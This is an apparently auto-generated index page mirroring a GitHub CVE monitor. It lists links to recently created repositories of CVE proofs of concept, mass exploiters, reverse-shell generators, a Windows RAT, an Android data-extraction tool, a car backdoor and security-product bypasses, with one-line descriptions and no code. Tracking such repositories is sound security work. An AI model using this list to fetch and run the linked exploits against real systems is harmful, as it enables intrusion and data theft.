Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/p1ay8y3ar/cve_monitor

Automatic monitor github cve using Github Actions
https://github.com/p1ay8y3ar/cve_monitor

Last synced: about 1 month ago
JSON representation

Automatic monitor github cve using Github Actions

Awesome Lists containing this project

README

        

# Automatic monitor github cve using Github Actions

> update time: 2024-08-04 14:21:40.178065 total: 33676


![star me](https://img.shields.io/badge/star%20me-click%20--%3E-orange) [cve monitor](https://github.com/p1ay8y3ar/cve_monitor) [Browsing through the web](https://p1ay8y3ar.github.io/cve_monitor/) ![visitors](https://visitor-badge.glitch.me/badge?page_id=cve_monitor)

**no description** : [enessakircolak/CVE-2024-1112](https://github.com/enessakircolak/CVE-2024-1112) create time: 2024-08-04T13:26:46Z

**EvilDroid automates the exploitation of CVE-2024-0044, installing malicious payloads on a target device and extracting sensitive data. It features automated ADB connection checks, APK pushing, UID extraction, payload generation, and real-time progress updates, providing a seamless and professional user experience.** : [nexussecelite/EvilDroid](https://github.com/nexussecelite/EvilDroid) create time: 2024-08-04T13:14:10Z

**12** : [White-BAO/CVE-2023-25813](https://github.com/White-BAO/CVE-2023-25813) create time: 2024-07-30T14:36:48Z

**CVE-2024-6704 - [Wordpress wpDiscuz_Plugin] < Unauthenticated HTML Injection Exploiter** : [codeb0ss/CVE-2024-6704](https://github.com/codeb0ss/CVE-2024-6704) create time: 2024-08-03T22:33:57Z

**no description** : [Abdurahmon3236/-CVE-2024-31211](https://github.com/Abdurahmon3236/-CVE-2024-31211) create time: 2024-08-03T19:26:55Z

**A Simple Python Program that uses gets a Remote Root Shell on the Target Device by exploiting a Vulnerability (CVE-2011-2523) present in vsFTP 2.3.4** : [Gill-Singh-A/vsFTP-2.3.4-Remote-Root-Shell-Exploit](https://github.com/Gill-Singh-A/vsFTP-2.3.4-Remote-Root-Shell-Exploit) create time: 2024-08-03T19:06:59Z

**no description** : [Abdurahmon3236/CVE-2024-38472](https://github.com/Abdurahmon3236/CVE-2024-38472) create time: 2024-08-03T16:08:28Z

**The tool helps in quickly identifying vulnerabilities by examining a comprehensive list of potential paths on a website, making it useful for security assessments.** : [lfillaz/CVE-2024-2997](https://github.com/lfillaz/CVE-2024-2997) create time: 2024-08-03T14:40:08Z

**no description** : [Abdurahmon3236/CVE-2024-6366](https://github.com/Abdurahmon3236/CVE-2024-6366) create time: 2024-08-03T10:30:49Z

**no description** : [nastar-id/CVE-2024-32700](https://github.com/nastar-id/CVE-2024-32700) create time: 2024-08-03T07:41:30Z

**no description** : [Abdurahmon3236/CVE-2024-36539](https://github.com/Abdurahmon3236/CVE-2024-36539) create time: 2024-08-03T06:37:21Z

**no description** : [Abdurahmon3236/CVE-2024-24549](https://github.com/Abdurahmon3236/CVE-2024-24549) create time: 2024-08-02T21:05:34Z

**no description** : [Abdurahmon3236/CVE-2024-5246](https://github.com/Abdurahmon3236/CVE-2024-5246) create time: 2024-08-02T20:56:39Z

**new poc's** : [Abdurahmon3236/CVE-2024-poc-s](https://github.com/Abdurahmon3236/CVE-2024-poc-s) create time: 2024-08-02T11:31:59Z

**Proof of concept exploit for CVE-2021-21551** : [Eap2468/CVE-2021-21551](https://github.com/Eap2468/CVE-2021-21551) create time: 2024-08-02T20:14:27Z

**no description** : [Abdurahmon3236/CVE-2024-40110](https://github.com/Abdurahmon3236/CVE-2024-40110) create time: 2024-08-02T20:17:25Z

**no description** : [Abdurahmon3236/-CVE-2024-39614](https://github.com/Abdurahmon3236/-CVE-2024-39614) create time: 2024-08-02T20:11:29Z

**no description** : [Abdurahmon3236/CVE-2024-6529](https://github.com/Abdurahmon3236/CVE-2024-6529) create time: 2024-08-02T20:02:39Z

**no description** : [Abdurahmon3236/CVE-2024-38473](https://github.com/Abdurahmon3236/CVE-2024-38473) create time: 2024-08-02T19:57:52Z

**adapting CVE-2024-32002 for running offline and locally** : [chrisWalker11/CVE-2024-32002](https://github.com/chrisWalker11/CVE-2024-32002) create time: 2024-08-02T18:44:00Z

**no description** : [chrisWalker11/CVE-2024-32002-Exploiting-Git-RCE-via-git-clone](https://github.com/chrisWalker11/CVE-2024-32002-Exploiting-Git-RCE-via-git-clone) create time: 2024-08-02T18:25:33Z

**CVE-2023-50564 PoC** : [ipuig/CVE-2023-50564](https://github.com/ipuig/CVE-2023-50564) create time: 2024-08-02T13:37:39Z

**Vulnerability Scanner for CVE-2024-37085 and Exploits ( For Educational Purpose only)** : [mahmutaymahmutay/CVE-2024-37085](https://github.com/mahmutaymahmutay/CVE-2024-37085) create time: 2024-08-02T13:31:59Z

**Python Script that will DoS a WP server that is utilizing WP-CRON** : [michael-david-fry/CVE-2023-22622](https://github.com/michael-david-fry/CVE-2023-22622) create time: 2024-03-20T13:48:48Z

**spip** : [Jhonsonwannaa/CVE-2023-27372](https://github.com/Jhonsonwannaa/CVE-2023-27372) create time: 2023-07-01T17:08:36Z

**This is a script written in Python that allows the exploitation of the Chamilo's LMS software security flaw described in CVE-2023-4220** : [charchit-subedi/chamilo-lms-unauthenticated-rce-poc](https://github.com/charchit-subedi/chamilo-lms-unauthenticated-rce-poc) create time: 2024-08-02T06:14:56Z

**no description** : [yisas93/CVE-2024-36401-PoC](https://github.com/yisas93/CVE-2024-36401-PoC) create time: 2024-08-01T21:22:51Z

**CVE-2024-0044: a "run-as any app" high-severity vulnerability affecting Android versions 12 and 13** : [hunter24x24/cve_2024_0044](https://github.com/hunter24x24/cve_2024_0044) create time: 2024-08-01T20:14:22Z

**Mass Exploit < [CVE-2024-7120 - Raisecom] - Command Injection** : [codeb0ss/CVE-2024-7120-PoC](https://github.com/codeb0ss/CVE-2024-7120-PoC) create time: 2024-08-01T17:39:45Z

**CVE-2024-34102 unauthenticated RCE PoC for Magento/adobe commerce** : [etx-Arn/CVE-2024-34102-RCE-PoC](https://github.com/etx-Arn/CVE-2024-34102-RCE-PoC) create time: 2024-08-01T17:36:33Z

**Microsoft Outlook Remote Code Execution Vulnerability.** : [HYZ3K/CVE-2024-21413](https://github.com/HYZ3K/CVE-2024-21413) create time: 2024-08-01T05:53:38Z

**Reappear-CVE-2022-21449-TLS-PoC** : [HeyMrSalt/AIS3-2024-Project-D5Team](https://github.com/HeyMrSalt/AIS3-2024-Project-D5Team) create time: 2024-08-01T03:27:17Z

**Exploit script for CVE-2022-41544 in GetSimple CMS, with enhanced error handling and detailed usage instructions.** : [Sp3c73rSh4d0w/CVE-2022-41544](https://github.com/Sp3c73rSh4d0w/CVE-2022-41544) create time: 2024-07-31T18:27:53Z

**no description** : [apena-ba/CVE-2024-39306](https://github.com/apena-ba/CVE-2024-39306) create time: 2024-07-31T14:57:03Z

**no description** : [apena-ba/CVE-2024-39304](https://github.com/apena-ba/CVE-2024-39304) create time: 2024-07-31T14:48:57Z

**no description** : [apena-ba/CVE-2024-6536](https://github.com/apena-ba/CVE-2024-6536) create time: 2024-07-31T14:31:56Z

**An exploit for CVE-2024-6387, targeting a signal handler race condition in OpenSSH's server** : [alex14324/ssh_poc2024](https://github.com/alex14324/ssh_poc2024) create time: 2024-07-31T14:19:19Z

**no description** : [Cerberus-HiproPlus/CVE-2024-32104](https://github.com/Cerberus-HiproPlus/CVE-2024-32104) create time: 2024-07-31T12:20:07Z

**no description** : [mprunet/cve-2024-32002-pull](https://github.com/mprunet/cve-2024-32002-pull) create time: 2024-07-31T11:59:17Z

**no description** : [mprunet/cve-2024-32002-malicious](https://github.com/mprunet/cve-2024-32002-malicious) create time: 2024-07-31T11:58:32Z

**no description** : [bolkv/CVE-2024-4320](https://github.com/bolkv/CVE-2024-4320) create time: 2024-07-31T11:54:31Z

**CVE-2024-36842, Creating Persistent Backdoor on Oncord+ android/ios car infotaiment using malicious script!** : [abbiy/Backdooring-Oncord-Android-Sterio-](https://github.com/abbiy/Backdooring-Oncord-Android-Sterio-) create time: 2024-05-09T12:28:11Z

**CVE-2022-22978's Nuclei-Template** : [BoB13-Opensource-Contribution-Team9/CVE-2022-22978](https://github.com/BoB13-Opensource-Contribution-Team9/CVE-2022-22978) create time: 2024-07-31T10:12:33Z

**批量验证POC和EXP** : [Jcccccx/CVE-2024-4577](https://github.com/Jcccccx/CVE-2024-4577) create time: 2024-07-31T10:14:14Z

**no description** : [smkxt1/CVE-2024-24919](https://github.com/smkxt1/CVE-2024-24919) create time: 2024-07-31T09:55:29Z

**no description** : [bananoname/cve-2021-42013](https://github.com/bananoname/cve-2021-42013) create time: 2024-07-31T07:48:39Z

**no description** : [raytran54/CVE-2019-1698](https://github.com/raytran54/CVE-2019-1698) create time: 2024-07-31T07:12:03Z

**CVE-2024-39081. BLE TPMS data manipulation over bluetooth communication.** : [Amirasaiyad/BLE-TPMS](https://github.com/Amirasaiyad/BLE-TPMS) create time: 2024-04-05T05:13:27Z

**QVD-2024-26473 && CVE-2021-29442** : [VictorShem/QVD-2024-26473](https://github.com/VictorShem/QVD-2024-26473) create time: 2024-07-31T03:56:30Z

**Just small script to exploit CVE-2024-32002** : [tiyeume25112004/CVE-2024-32002](https://github.com/tiyeume25112004/CVE-2024-32002) create time: 2024-07-30T23:20:51Z

**Bookea-tu-Mesa is vulnerable to SQL Injection** : [patrickdeanramos/CVE-2024-41302-Bookea-tu-Mesa-is-vulnerable-to-SQL-Injection](https://github.com/patrickdeanramos/CVE-2024-41302-Bookea-tu-Mesa-is-vulnerable-to-SQL-Injection) create time: 2024-07-14T13:01:36Z

**no description** : [patrickdeanramos/CVE-2024-41301-Bookea-tu-Mesa-is-vulnerable-to-Stored-Cross-Site-Scripting](https://github.com/patrickdeanramos/CVE-2024-41301-Bookea-tu-Mesa-is-vulnerable-to-Stored-Cross-Site-Scripting) create time: 2024-07-14T12:51:17Z

**GeoServer Remote Code Execution** : [Chocapikk/CVE-2024-36401](https://github.com/Chocapikk/CVE-2024-36401) create time: 2024-07-30T18:43:40Z

**no description** : [Mr-r00t11/CVE-2024-34693](https://github.com/Mr-r00t11/CVE-2024-34693) create time: 2024-07-30T18:02:25Z

**no description** : [miguelc49/cve202343667_sample1](https://github.com/miguelc49/cve202343667_sample1) create time: 2024-07-30T16:49:17Z

**no description** : [hyeonjun17/CVE-2022-2590-analysis](https://github.com/hyeonjun17/CVE-2022-2590-analysis) create time: 2024-07-30T15:54:07Z

**Vulnerable svg-to-png service** : [soulfoodisgood/CVE-2022-40146](https://github.com/soulfoodisgood/CVE-2022-40146) create time: 2024-07-30T15:00:00Z

**PoC of CVE-2024-32002 - Remote Code Execution while cloning special-crafted local repositories** : [NishanthAnand21/CVE-2024-32002-PoC](https://github.com/NishanthAnand21/CVE-2024-32002-PoC) create time: 2024-07-30T14:58:00Z

**no description** : [naroSEC/CVE-2021-33699_Task_Hijacking](https://github.com/naroSEC/CVE-2021-33699_Task_Hijacking) create time: 2024-07-30T13:06:59Z

**CVE-2024-40617 Exploit PoC** : [KyssK00L/CVE-2024-40617](https://github.com/KyssK00L/CVE-2024-40617) create time: 2024-07-30T11:50:45Z

**CVE-2024-6738...** : [XD3an/CVE-2024-6738](https://github.com/XD3an/CVE-2024-6738) create time: 2024-07-15T08:58:22Z

**Mass Exploit < [CVE-2024-7188 - Bylancer Quicklancer] - SQL Injection** : [codeb0ss/CVE-2024-7188-PoC](https://github.com/codeb0ss/CVE-2024-7188-PoC) create time: 2024-07-30T10:51:24Z

**no description** : [KaSooMi0228/CVE-2024-25600-Bricks-Builder-WordPress](https://github.com/KaSooMi0228/CVE-2024-25600-Bricks-Builder-WordPress) create time: 2024-07-30T09:02:31Z

**CVE-2023-43040 PoC** : [riza/CVE-2023-43040](https://github.com/riza/CVE-2023-43040) create time: 2024-07-29T17:39:14Z

**proof of concept python script for regreSSHion exploit** : [l-urk/CVE-2024-6387](https://github.com/l-urk/CVE-2024-6387) create time: 2024-07-30T06:13:11Z

**no description** : [cdiwakar/CVE-2024](https://github.com/cdiwakar/CVE-2024) create time: 2024-07-30T06:09:12Z

**CVE-2024-34102 unauthenticated RCE PoC for Magento/adobe commerce** : [etx-Arn/CVE-2024-34102-RCE](https://github.com/etx-Arn/CVE-2024-34102-RCE) create time: 2024-07-30T04:42:45Z

**This tool helps identify the CVE-2022-44149 vulnerability in routers, allowing researchers and security professionals to test their systems. It includes authentication header generation, payload delivery, and detailed logging for analysis.** : [geniuszly/CVE-2022-44149](https://github.com/geniuszly/CVE-2022-44149) create time: 2024-07-29T21:19:09Z

**CVE_2004_1151_VUL_PATCH** : [lulugelian/CVE_TEST](https://github.com/lulugelian/CVE_TEST) create time: 2024-07-29T15:21:28Z

**POC to test CVE-2024-39929 against EXIM mail servers** : [michael-david-fry/CVE-2024-39929](https://github.com/michael-david-fry/CVE-2024-39929) create time: 2024-07-29T15:09:53Z

**no description** : [Redshift-CyberSecurity/CVE-2024-41628](https://github.com/Redshift-CyberSecurity/CVE-2024-41628) create time: 2024-07-29T07:12:14Z

**no description** : [nidhihcl75/frameworks_av_AOSP10_r33_CVE-2024-0040](https://github.com/nidhihcl75/frameworks_av_AOSP10_r33_CVE-2024-0040) create time: 2024-07-29T11:45:41Z

**PoC for CVE-2024-34144** : [MXWXZ/CVE-2024-34144](https://github.com/MXWXZ/CVE-2024-34144) create time: 2024-07-29T03:02:39Z

**no description** : [nidhihcl75/frameworks_av_AOSP10_r33_CVE-2024-0049](https://github.com/nidhihcl75/frameworks_av_AOSP10_r33_CVE-2024-0049) create time: 2024-07-29T11:12:32Z

**no description** : [Dirac231/CVE-2024-40498](https://github.com/Dirac231/CVE-2024-40498) create time: 2024-07-29T10:13:15Z

**GIT RCE CVE-2024-32002** : [charlesgargasson/CVE-2024-32002](https://github.com/charlesgargasson/CVE-2024-32002) create time: 2024-07-29T10:00:41Z

**no description** : [AbrarKhan/G3_Frameworks_av_CVE-2024-0023](https://github.com/AbrarKhan/G3_Frameworks_av_CVE-2024-0023) create time: 2024-07-29T09:06:34Z

**no description** : [10urc0de/CVE-2024-39700-PoC](https://github.com/10urc0de/CVE-2024-39700-PoC) create time: 2024-07-29T08:33:12Z

**no description** : [LOURC0D3/CVE-2024-39700-PoC](https://github.com/LOURC0D3/CVE-2024-39700-PoC) create time: 2024-07-29T08:15:18Z

**no description** : [projectforsix/CVE-2021-45428-Defacer](https://github.com/projectforsix/CVE-2021-45428-Defacer) create time: 2024-07-29T07:11:06Z

**no description** : [AnastasiaStill/CVE-2024-81757-Apache-web-server-2.4.61](https://github.com/AnastasiaStill/CVE-2024-81757-Apache-web-server-2.4.61) create time: 2024-07-29T05:54:39Z

**no description** : [labc-dev/CVE-2024-34693](https://github.com/labc-dev/CVE-2024-34693) create time: 2024-07-29T04:30:23Z

**no description** : [LOURC0D3/CVE-2024-39700-test](https://github.com/LOURC0D3/CVE-2024-39700-test) create time: 2024-07-29T02:35:56Z

**RCE through git recursive cloning.** : [HexDoesRandomShit/CVE-2024-32002](https://github.com/HexDoesRandomShit/CVE-2024-32002) create time: 2024-07-29T01:06:19Z

**This repository contains scripts and resources for exploiting the Follina CVE and CVE-2021-40444 vulnerabilities in Microsoft Office. The scripts generate malicious document files that can execute arbitrary code on the target system.** : [basim-ahmad/Follina-CVE-and-CVE-2021-40444](https://github.com/basim-ahmad/Follina-CVE-and-CVE-2021-40444) create time: 2024-07-28T17:23:43Z

**A Reverse shell generator for gitlab-shell vulnerability cve 2024-32002** : [daemon-reconfig/CVE-2024-32002](https://github.com/daemon-reconfig/CVE-2024-32002) create time: 2024-07-28T14:22:01Z

**no description** : [veritas-rt/CVE-2010-0219](https://github.com/veritas-rt/CVE-2010-0219) create time: 2024-07-28T14:10:52Z

**no description** : [ckloh720/cve2023-29374](https://github.com/ckloh720/cve2023-29374) create time: 2024-07-28T11:15:30Z

**CVE-2024-4879 & CVE-2024-5217 ServiceNow RCE Scanning & Shodan Dork to find it.** : [NoTsPepino/CVE-2024-4879-CVE-2024-5217-ServiceNow-RCE-Scanning](https://github.com/NoTsPepino/CVE-2024-4879-CVE-2024-5217-ServiceNow-RCE-Scanning) create time: 2024-07-28T06:51:33Z

**no description** : [blackninja23/CVE-2024-32002](https://github.com/blackninja23/CVE-2024-32002) create time: 2024-07-27T23:44:25Z

**CVE-2024-34693: Server Arbitrary File Read in Apache Superset** : [mbadanoiu/CVE-2024-34693](https://github.com/mbadanoiu/CVE-2024-34693) create time: 2024-07-27T21:28:11Z

**CVE-2023-6553 exploit script** : [cc3305/CVE-2023-6553](https://github.com/cc3305/CVE-2023-6553) create time: 2024-06-29T17:01:51Z

**How to Check And Fix 0x80070643 Windows Update Error That Leads To CVE-2024-20666.** : [HYZ3K/CVE-2024-20666](https://github.com/HYZ3K/CVE-2024-20666) create time: 2024-07-27T11:27:08Z

**Questa repository contiene una replica (tentativo di replica) scritto in Python per CVE-2024-30088.** : [Admin9961/CVE-2024-30088](https://github.com/Admin9961/CVE-2024-30088) create time: 2024-07-27T10:41:33Z

**no description** : [CERTologists/HTTP-Request-for-PHP-object-injection-attack-on-CVE-2023-41892](https://github.com/CERTologists/HTTP-Request-for-PHP-object-injection-attack-on-CVE-2023-41892) create time: 2024-07-27T08:31:18Z

**CVE-2021-44228 vulnerability study** : [asd58584388/CVE-2021-44228](https://github.com/asd58584388/CVE-2021-44228) create time: 2024-07-26T19:59:47Z

**no description** : [PauloParoPP/CVE-2024-41110-SCAN](https://github.com/PauloParoPP/CVE-2024-41110-SCAN) create time: 2024-07-26T18:41:42Z

**POC Exploit for CVE-2021-31630 written in Python3 and using C reverse shell with non-blocking mode** : [FlojBoj/CVE-2021-31630](https://github.com/FlojBoj/CVE-2021-31630) create time: 2024-07-26T15:06:44Z

**no description** : [Jutrm/cve-2024-24919](https://github.com/Jutrm/cve-2024-24919) create time: 2024-07-26T15:17:58Z

**CVE-2024-41110 docker AuthZ exploit** : [secsaburo/CVE-2024-41110-](https://github.com/secsaburo/CVE-2024-41110-) create time: 2024-07-26T15:10:14Z

**使用两种不同的角度实现对于CVE-2022-3910的利用** : [TLD1027/CVE-2022-3910](https://github.com/TLD1027/CVE-2022-3910) create time: 2024-07-26T02:21:08Z

**Remote code execution Vulnerability in QloApps  (version 1.6.0.0)** : [3v1lC0d3/RCE-QloApps-CVE-2024-40318](https://github.com/3v1lC0d3/RCE-QloApps-CVE-2024-40318) create time: 2024-06-27T22:15:16Z

**The most advanced software for CVE-2024 exploits and WordPress vulnerabilities with the latest version/method.** : [codeb0ss/CVEploiterv2](https://github.com/codeb0ss/CVEploiterv2) create time: 2024-07-25T14:11:32Z

**no description** : [aleksey-vi/CVE-2024-40324](https://github.com/aleksey-vi/CVE-2024-40324) create time: 2024-07-25T13:48:22Z

**Implementation and exploitation of CVE-2023-7028 account takeover vulnerability related to GO-TO CVE weekly articles of the 11th week.** : [soltanali0/CVE-2023-7028](https://github.com/soltanali0/CVE-2023-7028) create time: 2024-07-25T11:39:01Z

**no description** : [vvpoglazov/cve-2024-41110-checker](https://github.com/vvpoglazov/cve-2024-41110-checker) create time: 2024-07-25T08:03:15Z

**no description** : [XiaoShaYu617/CVE-2020-9480](https://github.com/XiaoShaYu617/CVE-2020-9480) create time: 2024-07-25T06:55:59Z

**no description** : [AnastasiaStill/CVE-2024-23897](https://github.com/AnastasiaStill/CVE-2024-23897) create time: 2024-07-25T05:42:11Z

**no description** : [prelearn-code/CVE-2024-6387](https://github.com/prelearn-code/CVE-2024-6387) create time: 2024-07-25T02:32:19Z

**no description** : [dadvlingd/CVE-2024-21006](https://github.com/dadvlingd/CVE-2024-21006) create time: 2024-07-25T00:32:00Z

**no description** : [a-roshbaik/CVE_2024_30078_POC_WIFI](https://github.com/a-roshbaik/CVE_2024_30078_POC_WIFI) create time: 2024-07-24T20:56:54Z

**no description** : [a-roshbaik/CVE-2024-4577-PHP-RCE](https://github.com/a-roshbaik/CVE-2024-4577-PHP-RCE) create time: 2024-07-24T20:25:46Z

**no description** : [a-roshbaik/CVE-2024-4577](https://github.com/a-roshbaik/CVE-2024-4577) create time: 2024-07-24T20:23:03Z

**OpenPLC 3 WebServer Authenticated Remote Code Execution.** : [manuelsantosiglesias/CVE-2021-31630](https://github.com/manuelsantosiglesias/CVE-2021-31630) create time: 2024-07-24T15:28:47Z

**Mass Exploit < [CVE-2024-40348 - Bazarr] - Arbitrary File Read** : [codeb0ss/CVE-2024-40348-PoC](https://github.com/codeb0ss/CVE-2024-40348-PoC) create time: 2024-07-24T16:13:24Z

**geoserver CVE-2024-36401漏洞利用工具** : [ahisec/geoserver-](https://github.com/ahisec/geoserver-) create time: 2024-07-17T02:25:21Z

**Identify Nginx-ui version and check if it's vulnerable to CVE-2024-22198** : [xiw1ll/CVE-2024-22198_Checker](https://github.com/xiw1ll/CVE-2024-22198_Checker) create time: 2024-07-24T13:59:51Z

**no description** : [natpakun/SSRF-CVE-2018-25031-](https://github.com/natpakun/SSRF-CVE-2018-25031-) create time: 2024-07-24T10:21:30Z

**trellix DLP Bypass** : [pinpinsec/CVE-2023-0400](https://github.com/pinpinsec/CVE-2023-0400) create time: 2024-07-24T09:04:55Z

**ps4 cve-2008-3531** : [test-one9/ps4-11.50.github.io](https://github.com/test-one9/ps4-11.50.github.io) create time: 2024-07-24T06:58:07Z

**Remote Access Trojan (RAT) for Windows x64 using a combination of vulnerability CVE-2023-38831 (WinRAR < 6.23 vulnerability) and Shellcode exploitation technique.** : [MaorBuskila/Windows-X64-RAT](https://github.com/MaorBuskila/Windows-X64-RAT) create time: 2024-07-23T17:20:06Z

**Markdown XSS leads to RCE in VNote version <=3.18.1** : [sh3bu/CVE-2024-41662](https://github.com/sh3bu/CVE-2024-41662) create time: 2024-07-23T17:21:12Z

**Tool for checking Nginx CVE-2013-2028** : [xiw1ll/CVE-2013-2028_Checker](https://github.com/xiw1ll/CVE-2013-2028_Checker) create time: 2024-07-23T11:40:26Z

**This repository contains an PoC for the critical vulnerability identified as CVE-2024-41107 in Apache CloudStack** : [d0rb/CVE-2024-41107](https://github.com/d0rb/CVE-2024-41107) create time: 2024-07-23T09:39:42Z

**no description** : [labc-dev/CVE-2024-6666](https://github.com/labc-dev/CVE-2024-6666) create time: 2024-07-23T09:37:20Z

**no description** : [CERTologists/EXPLOITING-CVE-2024-27956](https://github.com/CERTologists/EXPLOITING-CVE-2024-27956) create time: 2024-07-23T08:24:56Z

**This template monitors active security advisories and CVEs in the Zabbix environment. It captures the latest security advisories and CVE information to generate the same view in Zabbix, ensuring continuous monitoring and integration. Date: 2024-07-18** : [higorcamposs/zabbix-security-advisories-cve-database](https://github.com/higorcamposs/zabbix-security-advisories-cve-database) create time: 2024-07-22T13:32:52Z

**no description** : [alpernae/CVE-2024-40422](https://github.com/alpernae/CVE-2024-40422) create time: 2024-07-03T21:43:15Z

**no description** : [pamoutaf/CVE-2024-34329](https://github.com/pamoutaf/CVE-2024-34329) create time: 2024-07-22T17:39:06Z

**信呼 v2.3.2 针对CVE-2023-1773的研究环境** : [CTF-Archives/xinhu-v2.3.2](https://github.com/CTF-Archives/xinhu-v2.3.2) create time: 2024-07-22T17:07:33Z

**a test repository for CVE-2018-17456's PoC** : [KKkai0315/CVE-2018-17456](https://github.com/KKkai0315/CVE-2018-17456) create time: 2024-07-22T10:15:44Z

**no description** : [griffinsectio/CVE-2023-30800_PoC_go](https://github.com/griffinsectio/CVE-2023-30800_PoC_go) create time: 2024-07-22T09:03:35Z

**PoC for LPE with QlikView** : [pawlokk/qlikview-poc-CVE-2024-29863](https://github.com/pawlokk/qlikview-poc-CVE-2024-29863) create time: 2024-07-22T07:38:34Z

**Hello everyone, I am sharing a modified script from CVE-2024-24919 which can extract paths categorized as critical.** : [H3KEY/CVE-2024-24919](https://github.com/H3KEY/CVE-2024-24919) create time: 2024-07-22T06:04:13Z

**no description** : [labc-dev/CVE-2024-0000](https://github.com/labc-dev/CVE-2024-0000) create time: 2024-07-22T04:20:51Z

**no description** : [labc-dev/CVE-2024-0666](https://github.com/labc-dev/CVE-2024-0666) create time: 2024-07-21T23:41:34Z

**CVE-2024-6694 - WP Mail SMTP < SMTP Password Exposure (Exploiter)** : [codeb0ss/CVE-2024-6694-PoC](https://github.com/codeb0ss/CVE-2024-6694-PoC) create time: 2024-07-21T21:41:02Z

**PoC for CVE-2024-5633** : [Adikso/CVE-2024-5633](https://github.com/Adikso/CVE-2024-5633) create time: 2024-07-21T20:27:24Z

**no description** : [Rai2en/CVE-2023-50564_Pluck-v4.7.18_PoC](https://github.com/Rai2en/CVE-2023-50564_Pluck-v4.7.18_PoC) create time: 2024-07-21T20:15:10Z

**CVE 2023-22515** : [Onedy1703/CVE-2023-22515](https://github.com/Onedy1703/CVE-2023-22515) create time: 2024-07-21T17:19:36Z

**a proof of concept for CVE-2019-5784** : [agenericapple/CVE-2019-5784-PoC](https://github.com/agenericapple/CVE-2019-5784-PoC) create time: 2024-07-21T14:30:28Z

**A PoC malware exploiting CVE-2024-26229** : [0XJ175/DRive](https://github.com/0XJ175/DRive) create time: 2024-06-13T01:24:10Z

**Bypass for Symantec Endpoint Protection's Client User Interface Password** : [apeppels/CVE-2022-37017](https://github.com/apeppels/CVE-2022-37017) create time: 2024-07-21T12:26:35Z

**no description** : [pamoutaf/CVE-2024-3432](https://github.com/pamoutaf/CVE-2024-3432) create time: 2024-07-21T10:35:43Z

**no description** : [CERTologists/Modified-CVE-2024-37081-POC](https://github.com/CERTologists/Modified-CVE-2024-37081-POC) create time: 2024-07-21T08:42:23Z

**no description** : [CERTologists/-CVE-2024-37081-POC](https://github.com/CERTologists/-CVE-2024-37081-POC) create time: 2024-07-21T08:41:40Z

**This is a python written PoC of a recent vulnerability in a wordpress plugin. More information on that here** : [j3r1ch0123/CVE-2024-6205](https://github.com/j3r1ch0123/CVE-2024-6205) create time: 2024-07-21T04:59:31Z

**no description** : [sviim/Clearml-CVE-2024-24590](https://github.com/sviim/Clearml-CVE-2024-24590) create time: 2024-07-21T04:16:24Z

**Kernel pointers copied to output user mode buffer with ioctl 0x22A014 in the appid.sys driver.** : [varwara/CVE-2024-38041](https://github.com/varwara/CVE-2024-38041) create time: 2024-07-21T02:29:18Z

**POC for CVE-2024-40348. Will attempt to read /etc/passwd from target** : [bigb0x/CVE-2024-40348](https://github.com/bigb0x/CVE-2024-40348) create time: 2024-07-21T00:54:55Z

**CVE-2024-34102 unauthenticated RCE PoC for Magento/adobe commerce and (NEW 0DAY)?** : [ex-ARnX/CVE-2024-34102-PoC](https://github.com/ex-ARnX/CVE-2024-34102-PoC) create time: 2024-07-21T00:22:54Z

**Educational exploit for CVE-2022-30190** : [ethicalblue/Follina-CVE-2022-30190-Sample](https://github.com/ethicalblue/Follina-CVE-2022-30190-Sample) create time: 2024-07-20T17:50:48Z

**no description** : [HPT-Intern-Task-Submission/CVE-2024-27198](https://github.com/HPT-Intern-Task-Submission/CVE-2024-27198) create time: 2024-07-20T17:26:13Z

**测试** : [labc-dev/CVE-2024-06666](https://github.com/labc-dev/CVE-2024-06666) create time: 2024-07-20T12:32:31Z

**Unauthenticated Sensitive Information Disclosure** : [aratane/CVE-2021-3831](https://github.com/aratane/CVE-2021-3831) create time: 2024-07-20T09:36:51Z

**CVE-2024-2024** : [labc-dev/CVE-2024-2024](https://github.com/labc-dev/CVE-2024-2024) create time: 2024-07-20T09:28:36Z

**CVE-2024-99999** : [labc-dev/CVE-2024-99999](https://github.com/labc-dev/CVE-2024-99999) create time: 2024-07-20T09:25:01Z

**CVE-2024-266666 test** : [labc-dev/CVE-2024-266666](https://github.com/labc-dev/CVE-2024-266666) create time: 2024-07-20T09:19:25Z

**Helios: Automated XSS Testing** : [Stuub/Helios](https://github.com/Stuub/Helios) create time: 2024-07-20T05:37:32Z

**no description** : [TSY244/CVE-2024-32002-git-rce](https://github.com/TSY244/CVE-2024-32002-git-rce) create time: 2024-07-20T04:31:26Z

**no description** : [TSY244/CVE-2024-32002-git-rce-father-poc](https://github.com/TSY244/CVE-2024-32002-git-rce-father-poc) create time: 2024-07-20T03:59:35Z

**no description** : [TSY244/CVE-2024-32002-git-rce-father-poc](https://github.com/TSY244/CVE-2024-32002-git-rce-father-poc) create time: 2024-07-20T03:14:50Z

**CVE-2022-37706-Enlightenment v0.25.3 - Privilege escalation** : [TACTICAL-HACK/CVE-2022-37706-SUID](https://github.com/TACTICAL-HACK/CVE-2022-37706-SUID) create time: 2024-07-19T23:12:40Z

**Prova de conceito de PHP CGI Argument Injection.** : [Fatalityx84/CVE-2012-1823](https://github.com/Fatalityx84/CVE-2012-1823) create time: 2024-07-19T21:53:37Z

**CVE-2024-2026** : [labc-dev/CVE-2024-2026](https://github.com/labc-dev/CVE-2024-2026) create time: 2024-07-19T09:10:32Z

**Poc** : [labc-dev/CVE-2024-35913](https://github.com/labc-dev/CVE-2024-35913) create time: 2024-07-19T09:09:12Z

**CVE-2024-35911** : [labc-dev/CVE-2024-35911](https://github.com/labc-dev/CVE-2024-35911) create time: 2024-07-19T09:09:07Z

**CVE-2024-3591** : [labc-dev/CVE-2024-3591](https://github.com/labc-dev/CVE-2024-3591) create time: 2024-07-19T09:09:04Z

**CVE-2024-40725 and CVE-2024-40898, affecting Apache HTTP Server versions 2.4.0 through 2.4.61. These flaws pose significant risks to web servers worldwide, potentially leading to source code disclosure and server-side request forgery (SSRF) attacks.** : [TAM-K592/CVE-2024-40725-CVE-2024-40898](https://github.com/TAM-K592/CVE-2024-40725-CVE-2024-40898) create time: 2024-07-19T03:51:54Z

**CVE-2023-3824** : [m1sn0w/CVE-2023-3824](https://github.com/m1sn0w/CVE-2023-3824) create time: 2024-07-19T02:37:36Z

**no description** : [Wytchwulf/CVE-2015-1397-Magento-Shoplift](https://github.com/Wytchwulf/CVE-2015-1397-Magento-Shoplift) create time: 2024-07-19T00:21:34Z

